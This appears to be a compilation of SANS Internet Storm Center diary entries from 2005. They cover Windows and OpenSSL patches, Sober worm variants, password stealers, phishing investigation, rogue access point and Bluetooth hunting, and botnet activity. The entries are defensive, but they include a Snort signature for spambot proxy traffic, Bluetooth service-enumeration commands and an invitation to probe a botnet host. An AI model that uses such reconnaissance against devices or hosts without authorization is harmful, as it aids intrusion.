This patch addresses a remote code of execution and local elevation of privilege vulnerability which exists in Plug and Play. This vulnerability is similar to the one addressed by MS05-039, however, it requires the attacker to have valid logon credentials to exploit the flaw. For those that have not patched for MS05-039 under Windows 2000, this issue could be exploited remotely by anonymous users. Windows XP SP2 computers must be able to log on locally in addition to having valid logon credentials for the administrator. This patch replaces MS05-039 which was released in August of the Zotob worm fame.
The standard practice of blocking ports 139 and 445 TCP will help slow exploitation of this. Just remember that the road warriors who are connected to less firewalled locations can potentially bring any such activity inside your organization.
Microsoft rates this vulnerability as an Important Severity as it does require valid logon credentials to attack a host. Knowing that many corporations and academic organizations use a common password for local administrator or other accounts on desktop computers, it is not unconceivable to me that this could be more critical then first look. Any passwords that were compromised with MS05-039 (or any other patches in the past year) could be used to satisfy the need of local credentials in 2000 and XP systems prior to exploitation. If all compromises of hosts in the past year or so resulted in all related passwords across the domain being changed, then this will be a mostly non-event. If old passwords are still in use, then botnets or other malware will widely exploit this one in due time.
MS05-050 Vulnerability in DirectShow
DirectShow is part of DirectX. This component is used to display audio and video stream. DirectX is able to do so very fast and efficiently by taking advantage of hardware specific acceleration.
In order to trigger this vulnerability, a user has to open a malicious .avi video file. If opened, the file may execute arbitrary code. This vulnerability is not able to escalate privileges by itself. So wherever damage will be done will be limited to files the user running DirectShow has access to.
Malicious .avi files would likely be delivered as an instant message link, a URL on a web site or they may be attached to an e-mail message.
Standard "safe computing" practices will help mitigate this vulnerability. For example, do not log in as "Administrator" for day to day work and avoid accessing untrusted web sites. However, these steps are not perfect and patching is highly recommended.
In some cases, in particular on servers, you may be able to do without DirectX. Let us know if you have a recipe on how to disable DirectX.
MS05-048 CDO Object Remote Code Execution
KB: Win2K SP4 - KB901017, WinXP SP1/SP2 - KB901017, Win2K3 - KB901017
Colloborative Data Objects (CDO) allow Windows systems to send email through SMTP or a Microsoft Exchange server. An unchecked buffer in the CDO functions for Windows 2000 and later systems (CDOSYS) and in Microsoft Exchange servers (CDOEX) allows an attacker to compromise the target host. In order to trigger this vulnerability, an attacker has to deliver a specially-crafted mail message via SMTP which is processed by the event sink handling subsystem, designed for granular processing of CDO messages.
The mitigating circumstance for this vulnerability is that IIS 5.0 and Exchange 2000 SMTP service do not use event sinks by default, which mitigates the vulnerability. IIS 6.0 SMTP service does use event sinks and is therefore vulnerable, but IIS 6 does not install the SMTP service by default. There is some confusion in the Microsoft bulletin about Exchange 2003 as it is listed as both "not vulnerable" and in the "affected software" sections of the bulletin.
The challenge with determining if your IIS SMTP service or Exchange 2000 system is vulnerabile depends on whether or not you are using event sinks on your system. Third-party software vendors such as SPAM gateways or anti-virus systems may install event sinks to process email messages, making these products vulnerable to this flaw.
The workaround is to disable event sinks, which may not be an option for your third-party AV or SPAM filtering software. Customers should apply the patches to resolve this flaw at the earliest opportunity.
MS05-052 Cumulative Security Update for Internet Explorer (896688)
Once again, watch out on this one because the only thing a part of this cumulative update does is set "the kill bit for the affected Class Identifiers (CLSID) in these COM objects.". And it's a growing list of kill bits MS is setting.
In your environment, if you cannot accept setting the kill bits involved in this "Cumulative" update, then you are effectively prevented from receiving other portions of the update, including "improvements to the Internet Explorer Pop-up Blocker" and "improvements to the Internet Explorer Add-on Manager." MS also mentions that the "Cumulative" Security Update "includes a kill bit for the ADODB.Stream object. This kill bit was released previously, but not as part of a security update. For more information about the ADODB.Stream object, see Microsoft Knowledge Base Article 870669. The Class Identifier (CLSID) for this object is 00000566-0000-0010-8000-00AA006D2EA4."
Previous commentary on kill bits - Open letter from the handlers
• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
• Microsoft Windows XP Professional x64 Edition
• Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems
• Microsoft Windows Server 2003 x64 Edition
• Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME)
A portion of this "Cumulative" update replaces MS05-037 and MS05-038.
SSL 2.0 Rollback in OpenSSL
This can be solved by either disabling SSL 2.0 entirely on either endpoint, or by upgrading the server software to one of the new OpenSSL versions.
For more information, see: http://www.openssl.org/news/secadv_20051011.txt
CA iGateway debug mode HTTP GET request bo vulnerability/exploit
Large botnet in the Netherlands taken down
A large botnet in the Netherlands, with over 100k infected, was taken down 3 days ago by a cooperative effort of several CERT's. The National High Tech Crime Centre, (NHTCC), GOVCERT.NL, and the Computer Emergency Response Team of the Dutch government worked together to take down this w32.toxbot - driven network.
For more information.....
User questions new WindowsUpdate Fix
For which Microsoft then submitted
So, today being a somewhat slow day, we were wondering if there are any readers who had problems with WindowsUpdate, and subsequently applied the listed patch? What were the results?
Happy turkey day
What I'm reading today
Jim Clausing, jclausing /at/ isc.sans.org, also see http://handlers.sans.org/jclausing/
DHCP OS Fingerprinting
Jim Clausing, jclausing /at/ isc.sans.org
More on hunting rogue access points
Jim Clausing, jclausing/at/isc.sans.org and http://handlers.sans.org/jclausing/
I haven't answered that question yet, there are still a number of theories, and very little evidence to sort. But I have made some progress in addressing the "who is attacking us?" question.
First, there is the bait-message. This is the email that is sent out with the hopes of finding appropriate targets. Each of these can be investigated as a spam campaign. They have their spam relays, they have their target list, they have their subset of subject messages, and they may or may not have a permutation of body.
I think it's possible that the people managing the spam campaign are separate from those managing the actual phishing attack. It's possible that separate phishing groups could employ a single spamming outfit. That's just a theory at the moment.
Secondly, there is the hook-site. This is where the link in the bait-message initially takes the victim. The hook-site may also be the collection-site, but it could forward the victim on to a separate collection server. This technique is especially common in cases where a phisher has a network of collection sites.
Use of network of sites, is an identifying quality of a phisher. I argue that given a set of phishing attacks, one can partition them to identify certain habits or modus operandi of the criminal actor. This actor may be an individual or a group.
There are two main ways that I use to build these partitions or clusters. You can compare how the hook-site or collection-site is built. By collecting copies of the phishing sites during your investigation and keeping them on hand, an investigator can go back and identify "repeat offenders." By comparing the fake website, to the target-firm's original site, you can examine any changes that the criminal applied. You could also approximately date when the site was copied—if you have a suitable change-control process on your web content.
Clusters and habits can also be detected in the URL used for the hook-site. How the criminal compromises, purchases, or otherwise acquires the hosting space can be evident in this URL. Are they creating suspiciously long domain names (implying they control the DNS,) or are they using doted directories in an attempt to hide the space from visual detection? Are the sites hosted off of cgi-bin space, or in directories of a BBS application? All of these qualities can be used to cluster a number of attacks into a smaller set of attackers.
Clustering along where a hook- or collection- site is hosted can sometimes illuminate a pattern; I did not find this to be the case in this population of URLs. I did find some interesting correspondences in the registrar used for some of the domains. This appeared to be indicative of an issue in the registrar's validation policies.
In an attempt to automate the detection and classification, I wrote some routines that calculate the "lexical distances" between the URLs used in the attacks. Then we built clusters based on arbitrary thresholds on these distances to see if the system was any better at classifying similar attacks than they humans. Needless to say, the trained human analyst will outperform my pathetic Perl script any day of the week, but they did find it helpful. Which is what it's all about.
Sadly, identifying clusters and forming a behavioral fingerprint of a criminal is a long way from identifying said criminal.
kliston -AT- isc sans org
Adventures in Hunting Rogue Wireless Access Points
This week I had to opportunity to hunt down some rogue WAPs at a client's campus. It was a very target-rich environment. Out of the 62 talker's that I spotted on the hunt, 39 of them were not the main, accepted infrastructure. Out of these 39, we were looking for only one. Not quite a needle-in-a-haystack problem, but more like something-under-a-desk-in-a-sea-of-cubicles problem.The Playing Field
The search area consisted of an extremely large low-rise facility with cubicles reminiscent of poultry factory farming.
Myself, with my trusty combat-laptop running Debian and Kismet 2005.04.R1 with an Orinoco Gold PCMCIA card, and an external directional antenna.
The engineer who designed the wireless infrastructure with his Windows XP laptop, Cisco Aironet card, and AiroPeek from WildPackets.
Well, it was more of a team effort.
Based on the results that we were seeing from the Engineer's WLSE (http://www.cisco.com/en/US/products/sw/cscowork/ps3915/) interface we knew that two of his WAPs could see the target, and we knew approximately where these WAPs were installed.
He went with the back-pack, cary-the-laptop around method, while I appropriated a cart to wheel around.
We went down to the area and wandering ensued. Eventually, kismet detected the beacon packets. The best way to use Kismet in hunting a single WAP is to bring up the details (the 'i' key in this version,) and keep an eye on the power rating. The 14dBi gain antenna wasn't as much use in the environment as I had hoped it would. It did help in determining if we were on the right floor, and which WAP is was most likely close to. It got us into the general area. Eventually you get too close to the transmitter for the antenna to be helpful.
Attenuation is Your Friend
As you get closer to the transmitter, the signal is hot enough that you can't see the subtle changes in intensity to help guide you in the correct direction efficiently. You need to "knock the signal down" a bit so that it fits better on your meter, so that you can read the changes.
My first step was to pull out the directional antenna. In what turned out to be good luck, the only cart that was available for me was a high walled metal cart used to transport hanging-files. This held my laptop and it's PCMCIA card in the bottom of a metal box. So it was shielded from the signal rather well.
Once I was in the right area, I would effectively worm my way around the cubes until I spotted the blinky box that we were after.
My initial plan to solve the rogue access point problem was to buy some prizes and have a few "Fox and Hound" contests on the weekend where some of the appropriately-minded employees could "compete." I still like that plan, but any time that you have people looking through cubes, you have to operate in teams so they can both keep-an-eye-on and vouch-for each other.
For more information on general transmitter hunting, I recommend Moell and Curlee's Transmitter Hunting: Radio Direction Finding Simplified. Although their focus is on a different frequency range, the general concepts apply.
kliston -AT- isc sans org
Request for packets 50032
If you have only logs, please submit them directly to dshield.org for processing. It is the packets that we are interested in.
kliston -AT- isc sans org
Bluetooth Followup Links
I failed to provide a link to btscanner by Pentest in the UK I did not use it in my tests, but I've heard good things about it.
Other intersting links that were sent to me:
and something interesting form slashdot:
kliston -AT- isc sans org
Tenable announced yesterday that Nessus 3 will be closed-source: http://news.com.com/Nessus+security+tool+closes+its+source/2100-7344_3-5890093.html?tag=nefd.hed
Checkpoint announced the purchase of Sourcefire, but promises to keep Snort open-source: http://www.checkpoint.com/sourcefire/index.html
kliston -AT- isc sans org
Microsoft October Security Bulletin Advanced Notification
I can't wait.
kliston -AT- isc sans org
Battle of the ISP's
According to the information Hardware Geeks - this is preventing web pages on one site from being accessed by the others ones customers.
It looks like these "boys" need a timeout. Go to opposite corners and take a deep breath. (Isn't that what we tell the children when they start fighting.)
It will definitely be interesting to watch this one play out.
Two New Sober Viruses on the Loose Today
It never fails somehow it seems that whenever I am to be the Handler On Duty we have another little Smurf pop out of the closet. Today's little Smurf is Sober.R or Sober.Q or Worm_Sober.AC or ...., well you get the drift. (What's in a name anyway. ) However, I am pleased to say that the official CME has been released for this little fella'. Nothing to report there yet - says Not Currently Available. You'll have to keep checking back to see what the update brings.
We do however believe that we are working with at least two different versions.
FSecure has an interesting write up on this and is calling the second one a Dropper. Take a look at the info in F-Secures writeup.
Our malware team is looking at the code as we speak. It appears that this one is picky about who is blessed to receive a copy. It appears to be a self mailer. Our malware team is hard at work attempting to identify evaluate this thing and will update us as soon as possible.
It looks like the attachment name may have changed as well. The one that I just received had the attachment name
and appears to be according to the subject my "Registration Confirmation".
The program is packed with some pretty nasty stuff. It looks like it may scan the hard drive to see what additional mischief it can create. It appears to create a file services.exe and sets itself up to run in the registry.
We will keep you updated on any additional info that we get on this.
Sober Virus (CME-151)
This variant uses different email messages randomly in either German or English. We have received several reports from our readers. One reader submitted to us with the email message as below:
Danke für Ihre Mail ....
Sie haben aber Ihre Mail wahrscheinlich falsch adressiert,,, nämlich an mich. Ich kenne sie aber nicht!
Oder Ihr Provider hat die Mail falsch weiter geleitet!?
Um mich zu entlasten, schicke ich Ihnen das (...) Foto wieder zurück.
This virus arrives with one of the following attachment names:
Inside the ZIP archive is a file named PW_Klass.Pic.packed-bitmap.exe.
You can check out more details from various antivirus vendors website:
Pwstealers - evolution
While reading Mike's great story from yesterday's diary I thought about post this little story about my observations of Password Stealers, also known as PWstealers.
I have been watching this kind of malware for some time. I dont have exactly numbers but I am pretty sure that Brazil is one of the most targeted countries for this kind of scam...
I currently can distinguish four kinds of the pwstealers:
- The keyloggers/screenloggers
- The fake bank windows
- Fake Bank webservers
- The downloaders
The keyloggers/screenloggers will detect the bank urls and then try to get most of the information available and then send it to and email. I already found a compromised machine that was hosting hundreds of directories, and each one was from a machine and inside it, hundreds of small images from the user clicking, to find his/her passwords...
The fake bank windows is a funny one...whenever it detects the bank urls, it would call IE with a fake website of the bank that you typed.:) The funny was that not rare, the fake websites were outdated and with some strange graphics...The user was suppose to fill all fields and then the windows would close with an (also fake) error message...:)
The fake bank webservers are quite interesting. This malware would install a webserver on the machine, change the hosts file to redirect a specific bank domain to his localhost, which would be running the Bank homepage, right?:)
The fourth one is quite obvious and sometimes even I am not sure if I would put in the same category (pw stealers). But I am putting because these ones are specific for pwstealers. These downloaders usually will contact a free hosting site and download a piece of one of the three kinds above...!
Another thing that I am also observing is that they are changing the way the code is packed...recently they are changing the king of packer used, to some more powerful ones...more difficult to reverse...
Ah, if you are following my malware analysis quiz, I posted the results of the first one last friday and already put the new one, which the answers should be sent no longer than Oct 15. :) I hope that you are having as much fun as I am!:) I am already getting some really great answers!
Handler on Duty: Pedro Bueno - pbueno $$ ( isc. sans. org )
CME was officially lauched
Today the US-CERT and Mitre released the CME, the Common Malware Enumeration, in a document called "Common Malware Enumeration Initiative Now Available" . As it is supported by a board of Anti-Virus vendors, I believe that this initiative is really great and hope that it could be adopted by all the vendors as well, so we could also have more accurante numbers about virus variants.
This initiative seeks (according the document):
- Reduce the public's confusion in referencing threats during malware incidents
- Enhance communication between anti-virus vendors
- Improve communication and information sharing between anti-virus vendors and the rest of the information security community
Handler on Duty: Pedro Bueno - pbueno $ ( isc . sans. org)
Big Business surrounding Internet Fraud
I highly recommend reading Spam Kings ( http://www.oreilly.com/catalog/spamkings/ ) on the specific topic of how the Spam business works. On the other hand, we have marginal businesses and organized crime participating in the electronic boom as well.
DDoS for Hire: These are the hired guns of the internet. They will offer to knock competitors off the internet for a sum of money. The most famous of these cases revolves around Jay Echouafni, who was the CEO of TV retailer Orbit Communications. He paid a group of underground computer criminals to DoS his competitors offline. The series of outages cost an estimated $2 million dollars in damages. There is a great read on this at Security Focus ( http://www.securityfocus.com/news/9411 )
DDoS for Ransom: This is the online version of an extortion racket. Ive seen this up close and personal when clients receive an email requesting that payment be made or they will be knocked off the internet. One of the most famous cases here was of an online casino based out of Costa Rica. When they were first contacted, the sum of money being requested seemed reasonable to the site owner. He paid it. Never, ever, ever, ever, ever... give in to these people. First he paid approximately $500 for protection. The following week, the request was a tad higher... $40K. The site owner requested help from the Costa Rican Police, from the FBI and other law enforcement agencies. He did not recieve the help (perhaps the feds did not like the idea of offshore gaming). He finally enlisted the help of a security consultant who analyzed the data, traced the attacks back to an RCM (Russian Cyber Mafia, for those in the know).
Phishing Phraud: No dont worry, Im not going to go on a long tyrade of words with PH's. We are all familiar with this field of online crime. Jacomo Piccollini, from the Brazilian Research Network, gave a fantastic talk at a conference I recently attended. His topic was about the brazilian underground. One of the points he made was that Brazilian web defacement groups (of which Brazil happens to be world champion) were being hired by phishing groups to provide hosting of the phishing support sites on the defaced web servers. Some of these programmers that were working for the BCM (yes, Brazilian Cyber Mafia) were making $3K a month. The sad point here is that 4 of these programmers ended up dead last year, execution style.
The internet has reinvented business as we know it, both for good and evil. I would like to extend a big thank you to all the Internet Storm Center readers that submit information to us, and continue to battle evil one bit at a time.
Mike Poor mike at intelguardians d0t com
Handler on Duty
Symantec Antivirus Scan Engine: Web Service Administrative Interface Buffer Overflow
Patch today folks.
Symantec's Advisory, (with patch and mitigation information) states the "Risk Impact" is High. Affected versions listed are;
|Symantec AntiVirus Scan Engine||4.0||All||SAVSE 4.3.12|
|Symantec AntiVirus Scan Engine||4.3||All||SAVSE 4.3.12|
|Symantec AntiVirus Scan Engine for ISA||4.0||All||SAVSE 4.3.12|
|Symantec AntiVirus Scan Engine for ISA||4.3||All||SAVSE 4.3.12|
|Symantec AntiVirus Scan Engine for Netapp Filer||4.0||All||SAVSE 4.3.12|
|Symantec AntiVirus Scan Engine for Messaging||4.3||All||SAVSE 4.3.12|
|Symantec AntiVirus Scan Engine for Netapp NetCache||4.0||All||SAVSE 4.3.12|
|Symantec AntiVirus Scan Engine for Network Attached Storage||4.3||All||SAVSE 4.3.12|
|Symantec AntiVirus Scan Engine for Bluecoat||4.0||All||SAVSE 4.3.12|
|Symantec AntiVirus Scan Engine for Caching||4.3||All||SAVSE 4.3.12|
|Symantec AntiVirus Scan Engine for Microsoft SharePoint||4.3||All||SAVSE 4.3.12|
|Symantec AntiVirus Scan Engine for Clearswift||4.0||All||SAVSE 4.3.12|
|Symantec AntiVirus Scan Engine for Clearswift||4.3||All||SAVSE 4.3.12|
|Symantec AntiVirus Scan Engine||4.1||All|
I am currently a witness to the receiving end of a large scale brute force attack leveraged by a decently sized proxy botnet consisting of anywhere from 8k-12k nodes attacking at any time on any given day. I'm somewhat frustrated by the ongoing success of these botnet variants due to this particular variant's HTTP based phone home method to register the client IP and socks proxy listner port. Why oh Why does it have to be so hard to kill these international web servers dead. The specific Mitglieder variant I have been looking at lately has at least 42 unique HTTP phone home destinations that are still DNS resolvable. The bots phone home with the following HTTP GET patterns which result in the target HTTP server logging the client IP address including the socks proxy port number as a query string argument. Even though many of these servers are obviously virtual hosting environments that return 404 errors or other status codes, it is still possible that they are involved in this mess since the HTTP server will still continue to gladly log the pertinent client IP and port number of infected nodes via error logging.
In the following list, the tpoint.ru host is currently THE WORST of them and possibly the primary node in masterminding the aggregation and distribution of the active botnet list to other top level proxy abusers to be used for bulk mailer and other abuse types that benefit from an additional hop of anonymous connectivity. This is absolutely organized big business. Within minutes of sending a fake connection to tpoint.ru you would see inbound socks proxy abuse. Try it, you'll see. Whether you like it is another matter altogether.
Here's a snort signature that can help identify not only Mitglieder proxy infections on your networks, but just about any other proxy bot variant when they are abused for bulkmailing purposes. Apologies for the snort signature line wrap. Yes, the rule should be one single line.
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "BLEEDING-EDGE Spambot Proxy Control Channel"; flow: established; content:"|04010019|"; offset: 0; depth: 4; classtype: trojan-activity; sid: 2001814; rev:4; )
After you've completed your own personal investigations, I myself recommend blocking access to the following host names from your networks.
Give 'em hell.
Handler on Duty (heh heh)
Future homepage for the above handler.
Arnold muscles in to put the smackdown on phishers.
I hope it's not long before Virginia has an equivalent law on the books. If not, I'll petition for it and ask that the default maximum amount be set to 1mil(USD). Hey, Why not?
All samples provided were of the 'Registry fix, You need our application' spam, and if you regularly look at traffic capture this is will be nothing new. I am almost to the point where I treat UDP/1025-1030 as universal background noise.
Kaspersky Anti-Virus Products Remote Heap Overflow Vulnerability
"Tim ... is spending 1 to 2 weeks of his personal vacation time on assignment in our disaster operations warehouse in Austin, TX, performing configuration management and deployment of computer assets to shelters."
"Robert ... is spending one or more days of his personal time helping us to configure our new TippingPoint IPSs at national HQ."
"Chris ..., and project manager, Russ ..., configured and delivered 16 IBM donated Thinkpads to four chapter/disaster operations locations in Mobile, Pascagoula, Gulfport, and Hattiesburg on Friday and Saturday, Sept. 9-10. Those laptops are being used in shelter and client assistance operations."
"A week ago I mentioned two volunteers that were helping us out. Since then, we have engaged many more SANS volunteers. At this point I am not sure if I can even identify them all, since I shared our list of volunteers with so many people that needed technology help in our various Gulf coast service areas. But we know they're helping. As well as individuals, there are companies helping us out."
Folks, it goes without saying but Thanks Very Much for all that you are doing to assist in the recovery efforts! Please keep up the great work and the volunteer spirit!
Storm Center in the News
I used what I call my "combat laptop," or the "throwaway laptop." This is the one that I carry with me when I travel and go to conferences. It's had a lot of damage, but it still runs linuxes just fine. This particular incarnation is running Debian and I used the BlueZ bluetooth stack/suite (http://www.bluez.org/)
The Bluetooth interface I used is a Belkin Bluetooth USB Adapter (F8T001).
Getting it up and running wasn't trivial; I found the following links to be helpful resources:
http://www.kevinboone.com/PF_p800_linux.html (specifically with it's references to bluezfw.)
Actually, nothing I tried could get it to work, until I moved the bluetooth dongle to another USB port. I'm not sure why that was required, but I'm not always the smartest little Mouseketeer.
While experiementing with other platforms, I found that knoppix includes bluetooth USB support.
While googling on the topic, you will find lots of references to customized software used for the scanning (and by references you see people mention it, but nobody coughs up a link.) Since my initial goal was simple enumeration of devices and quick assessment of how "juicy" a given target area is, I did not have need for actual bluetooth exploits. I found that the basic tools in the BlueZ tool suite were sufficient for my needs.
Starting simply with:
This will list the hardware ID numbers and a manufacturer's name of any device advertising in range. That "advertising" part is important. These would be the wardriving equivalent of wide open WAPs broadcasting.
If you are looking for particular services to exploit -- er enumerate, you can simply scan for devices that support the feature of interest. For example, to find devices capable of setting up a dial-up internet connections, you would use:
sdptool search DUN
Other interesting services to search for are FTRN (for file transfer,) and OPUSH.
A much more scientific way to go about this process is to use bp from the trifinite group (http://trifinite.org/) which I like because it relies on BlueZ's sdptool, and the Bluetooth Device Security Database (http://www.betaversion.net/btdsd/) all glued together with perl. Nice and simple and hackable.
Their process interrogates a bluetooth device using sdptool browse --tree XX:XX:XX:XX:XX:XX (which might be handy to have around later anyway.)
Although the box advertised 100m ranges, a dongle plugged into the side of a laptop isn't in an ideal location for signal reception. Use of a USB extension cable is recommended. If you want to get really crazy, place the dongle in the focus point of a parabolic dish (I haven't tried that myself, but I've heard it works for 802.11 dongles.) You could also hack an external antenna onto your bluetooth interface (http://trifinite.org/trifinite_stuff_bluetooone.html) I haven't tried this either. The orderlies don't like me around soldering irons and glue-guns.
Unlike wardriving, this is more of a sit-and-wait game. Bluetooth devices and users are mobile, so it's better to pick a proper high-traffic area (or better yet: the meeting room where you're holding your audit kick-off meeting.) With enough sensors and proper placement, you can track the movement of your bluetooth users within your facility or campus. I'm sure nobody would do anything bad with that information. :-\
In other related neat-stuff-to-do
Check out http://cellspotting.com for something only peripherally related.
It is my first shift with the new system (be gentle,) any errors in typography, grammar, or HTML syntax are purely my own.
kliston -at- isc sans org